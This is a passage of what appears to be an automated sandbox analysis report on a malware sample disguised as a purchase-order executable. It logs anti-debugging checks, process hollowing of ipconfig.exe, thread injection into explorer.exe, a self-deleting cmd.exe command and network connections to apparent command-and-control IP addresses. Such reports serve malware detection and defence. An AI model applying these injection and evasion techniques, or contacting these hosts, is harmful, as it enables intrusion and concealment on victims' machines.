Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7DB60 mov ecx, dword ptr fs:[00000030h] 5_2_02E7DB60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h] 5_2_02EA3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h] 5_2_02EA3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7DB40 mov eax, dword ptr fs:[00000030h] 5_2_02E7DB40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48B58 mov eax, dword ptr fs:[00000030h] 5_2_02F48B58
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7F358 mov eax, dword ptr fs:[00000030h] 5_2_02E7F358
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3131B mov eax, dword ptr fs:[00000030h] 5_2_02F3131B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h] 5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h] 5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h] 5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E758EC mov eax, dword ptr fs:[00000030h] 5_2_02E758EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0B8D0 mov ecx, dword ptr fs:[00000030h] 5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h] 5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB90AF mov eax, dword ptr fs:[00000030h] 5_2_02EB90AF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAF0BF mov ecx, dword ptr fs:[00000030h] 5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h] 5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h] 5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79080 mov eax, dword ptr fs:[00000030h] 5_2_02E79080
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h] 5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h] 5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F32073 mov eax, dword ptr fs:[00000030h] 5_2_02F32073
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F41074 mov eax, dword ptr fs:[00000030h] 5_2_02F41074
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h] 5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h] 5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h] 5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h] 5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h] 5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h] 5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h] 5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h] 5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h] 5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h] 5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F041E8 mov eax, dword ptr fs:[00000030h] 5_2_02F041E8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF69A6 mov eax, dword ptr fs:[00000030h] 5_2_02EF69A6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h] 5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h] 5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h] 5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9C182 mov eax, dword ptr fs:[00000030h] 5_2_02E9C182
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA185 mov eax, dword ptr fs:[00000030h] 5_2_02EAA185
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA2990 mov eax, dword ptr fs:[00000030h] 5_2_02EA2990
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C962 mov eax, dword ptr fs:[00000030h] 5_2_02E7C962
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h] 5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h] 5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h] 5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h] 5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 mov ecx, dword ptr fs:[00000030h] 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h] 5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h] 5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h] 5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h] 5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h] 5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA16E0 mov ecx, dword ptr fs:[00000030h] 5_2_02EA16E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E876E2 mov eax, dword ptr fs:[00000030h] 5_2_02E876E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48ED6 mov eax, dword ptr fs:[00000030h] 5_2_02F48ED6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA36CC mov eax, dword ptr fs:[00000030h] 5_2_02EA36CC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB8EC7 mov eax, dword ptr fs:[00000030h] 5_2_02EB8EC7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2FEC0 mov eax, dword ptr fs:[00000030h] 5_2_02F2FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF46A7 mov eax, dword ptr fs:[00000030h] 5_2_02EF46A7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h] 5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h] 5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h] 5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0FE87 mov eax, dword ptr fs:[00000030h] 5_2_02F0FE87
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8766D mov eax, dword ptr fs:[00000030h] 5_2_02E8766D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h] 5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h] 5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h] 5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h] 5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7E620 mov eax, dword ptr fs:[00000030h] 5_2_02E7E620
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2FE3F mov eax, dword ptr fs:[00000030h] 5_2_02F2FE3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h] 5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h] 5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h] 5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA8E00 mov eax, dword ptr fs:[00000030h] 5_2_02EA8E00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h] 5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h] 5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F31608 mov eax, dword ptr fs:[00000030h] 5_2_02F31608
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB37F5 mov eax, dword ptr fs:[00000030h] 5_2_02EB37F5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h] 5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h] 5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h] 5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E88794 mov eax, dword ptr fs:[00000030h] 5_2_02E88794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8FF60 mov eax, dword ptr fs:[00000030h] 5_2_02E8FF60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48F6A mov eax, dword ptr fs:[00000030h] 5_2_02F48F6A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8EF40 mov eax, dword ptr fs:[00000030h] 5_2_02E8EF40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h] 5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h] 5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAE730 mov eax, dword ptr fs:[00000030h] 5_2_02EAE730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h] 5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h] 5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h] 5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h] 5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h] 5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h] 5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9F716 mov eax, dword ptr fs:[00000030h] 5_2_02E9F716
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F314FB mov eax, dword ptr fs:[00000030h] 5_2_02F314FB
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h] 5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h] 5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h] 5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F48CD6 mov eax, dword ptr fs:[00000030h] 5_2_02F48CD6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8849B mov eax, dword ptr fs:[00000030h] 5_2_02E8849B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9746D mov eax, dword ptr fs:[00000030h] 5_2_02E9746D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h] 5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h] 5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAA44B mov eax, dword ptr fs:[00000030h] 5_2_02EAA44B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EABC2C mov eax, dword ptr fs:[00000030h] 5_2_02EABC2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h] 5_2_02EF6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h] 5_2_02EF6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h] 5_2_02EF6C0A
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013ED6DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_013ED6DE
Enables debug privileges
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E605C SetUnhandledExceptionFilter, 0_2_013E605C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_013E032D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013DD3A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_013DD3A1

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 194.35.122.226 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.201.11.126 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.134.22.63 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.224.182.242 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.253.79.71 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 52.71.133.130 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.12.202.18 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.86.218.70 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 13.226.173.80 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3292 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' Jump to behavior
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000002.00000000.254074114.0000000005F40000.00000004.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.501463213.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoA, 0_2_013EC95A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_013E81CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 0_2_013E883F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_013E8B37
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_013EC321
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 0_2_013E8B73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_013E8A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 0_2_013E5A51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 0_2_013EC247
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,__